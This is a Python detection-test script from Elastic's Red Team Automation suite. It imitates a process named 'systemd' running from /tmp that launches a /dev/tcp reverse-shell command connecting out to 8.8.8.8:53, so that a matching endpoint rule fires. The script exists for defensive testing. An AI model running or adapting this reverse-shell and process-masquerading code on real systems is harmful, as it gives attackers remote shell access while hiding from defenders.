# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import os
import sys
from pathlib import Path
from . import RtaMetadata, common
# RTA (Red Team Automation) descriptor.  `platforms` gates where main() may run
# (see the requires_os decorator below); `endpoint` names the detection rule this
# test is presumably meant to trigger — verify against the rule definition.
metadata = RtaMetadata(
    uuid="517a466b-f11f-4469-8e5a-a39f4edf333a",
    # Linux only: the test relies on bash's /dev/tcp pseudo-device and os.fork().
    platforms=["linux"],
    endpoint=[
        {
            "rule_name": "Systemd Execution Followed by Network Connection",
            "rule_id": "6644d936-36a2-4d21-95f3-4826e6b61b9b",
        },
    ],
    # MITRE ATT&CK technique IDs: T1543 Create or Modify System Process,
    # T1059 Command and Scripting Interpreter, T1071 Application Layer Protocol.
    techniques=["T1543", "T1059", "T1071"],
)
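def _create_executable(path: str, content: bytes) -> None:
    """Create *path* holding *content* with mode 0755, refusing to reuse an existing path.

    The artifacts live in world-writable /tmp and the RTA is normally run as root, so a
    plain open()/``cp`` would follow a symlink or overwrite a file planted there by
    another local user (CWE-377 / CWE-59).  O_CREAT|O_EXCL makes creation atomic and
    fails if anything (file, directory, symlink) already exists at *path*; O_NOFOLLOW
    is belt-and-braces against symlinks.

    Args:
        path: absolute path of the file to create.
        content: bytes to write.

    Raises:
        FileExistsError: something already exists at *path*; it is left untouched.
        OSError: any other failure from open/write/fchmod.
    """
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o755)
    with os.fdopen(fd, "wb") as handle:
        handle.write(content)
        # The mode passed to os.open is masked by umask; set the bits explicitly.
        os.fchmod(fd, 0o755)


@common.requires_os(*metadata.platforms)
def main() -> None:
    """Emulate a process named ``systemd`` that spawns a shell making an outbound connection.

    Sequence:
      1. Copy /bin/bash to /tmp/bash and write a one-line bash script to /tmp/systemd
         that runs ``/tmp/bash -c 'sh -i >& /dev/tcp/8.8.8.8/53 0>&1'``.
      2. fork(); the child exec()s /tmp/systemd, giving a process tree of
         systemd -> bash -> sh with the inner shell's stdio attached to a TCP socket.
      3. The parent waits for the child, then removes the artifacts it created.

    Caveats for operators:
      * This makes a real outbound TCP connection to 8.8.8.8:53.  If egress is blocked
        the connect fails (or times out) and the rule's network event will not be
        produced; if the peer accepts and holds the connection, ``sh -i`` may block on
        the socket — the waitpid() below has no timeout.
      * The fixed /tmp paths are presumably what the rule keys on (a "systemd" running
        from an unusual location), so they are not randomised.  Instead both files are
        created atomically and the run aborts if either path already exists, rather
        than writing through whatever another user left there.

    Raises:
        FileExistsError: /tmp/bash or /tmp/systemd already exists.
        OSError: copy, fork or wait failure.
    """
    shell_command = "/tmp/bash"
    shell_args = "-c 'sh -i >& /dev/tcp/8.8.8.8/53 0>&1'"
    parent_process = "/tmp/systemd"

    # Only paths this run actually created are removed on exit, so a pre-existing
    # (possibly planted) file is never deleted from under another user.
    created = []
    try:
        # Stage the artifacts in-process rather than via `cp`/`chmod` children so both
        # files can be created with O_EXCL|O_NOFOLLOW.
        _create_executable(shell_command, Path("/bin/bash").read_bytes())
        created.append(shell_command)
        _create_executable(
            parent_process,
            f"#!/bin/bash\n{shell_command} {shell_args}\n".encode("utf-8"),
        )
        created.append(parent_process)

        # os.fork() so the fake "systemd" runs as a separate process image.
        pid = os.fork()
        if pid == 0:
            # Child: replace ourselves with the fake parent process script.  exec only
            # returns on failure, and the child must never fall through into the
            # parent's Python code (it would run cleanup and sys.exit a second time).
            try:
                os.execl(parent_process, parent_process)  # noqa: S606
            except OSError as exc:
                # Unbuffered write: os._exit() skips Python-level buffers.
                os.write(2, f"exec of {parent_process} failed: {exc}\n".encode("utf-8"))
            finally:
                os._exit(127)

        # Parent: wait for the child and surface its wait status so a failed connect
        # is visible in the RTA log instead of passing silently.
        _, status = os.waitpid(pid, 0)
        common.log("Fake parent process script executed")
        common.log(f"Child wait status: {status}")
        common.log("RTA execution completed.")
    finally:
        # Cleanup always runs, even if staging or fork() failed part-way.
        for path in reversed(created):
            common.remove_file(path)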
# Script entry point.  main() is annotated -> None, so (assuming common.requires_os
# passes the return value through unchanged) sys.exit(None) yields status 0; an
# uncaught exception produces a traceback and status 1.
if __name__ == "__main__":
    sys.exit(main())